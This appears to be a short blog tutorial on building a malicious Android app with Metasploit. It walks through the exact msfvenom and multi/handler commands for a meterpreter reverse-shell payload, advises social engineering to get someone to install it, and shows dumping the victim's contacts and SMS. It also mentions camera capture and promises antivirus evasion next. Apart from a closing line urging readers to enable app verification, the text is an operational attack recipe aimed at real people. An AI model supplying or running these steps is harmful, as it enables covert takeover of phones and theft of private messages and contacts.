So, recently got interested in how secure Android apps are and how I could learn a bit more about them. The best way to learn? Create my own malicious App!
What else would we use other than Metasploit?
So we fire up the console like so…
service postgresql start
msfconsole
First we need to create the malicious .apk file, so open another Terminal Window and use the following making sure you enter your IP and port number after the “=” symbols.
msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -o malicious.apk
You can name the app whatever you like using the “-o” switch. There are also other options you can specify but we will keep it simple for now.
In the first Window running Metasploit we now start a handler which will “listen” for when our app is installed and used which launches the connection attempt. We do this like so.
use exploit/multi/handler
Then we need to set IP, Port and Payload. The port and IP need to be the same set in the previous steps when using msfvenom
set LHOST xx.xx.xx.xx
set LPORT xxxx
set PAYLOAD android/meterpreter/reverse_tcp
We can check what is required for an exploit at any time once it is loaded by running
show options
We have everything we need now configured so we can start the “listener”
run
Then we use social engineering to try and get someone to install and run it.
When they do you will the connection come back from the phone.
In this example we got 2 connections! We can list them with this command
sessions -i
We can then connect by using the same command but choosing which session we want to connect to.
sessions 1
And then quickly get some info to confirm the device.
sysinfo
Then we can quickly dump info from the phone imediately using the dump commands
dump_contacts
dump_sms
You can also capture a screen shot, take a photo front either camera, or even stream live from either camera on the device. Scary huh?
If you have NO anti Virus on your Android, and you have disabled the “verify app” feature then this simple app will run without any issues.
If you have an Android phone, enable the app verifier, and get some anti virus to at least give yourself a fighting chance!
There will be a follow up to this post as there are tools we can use to make our malicious apps look better and be less likely to be blocked by anti virus. That’s it for now though.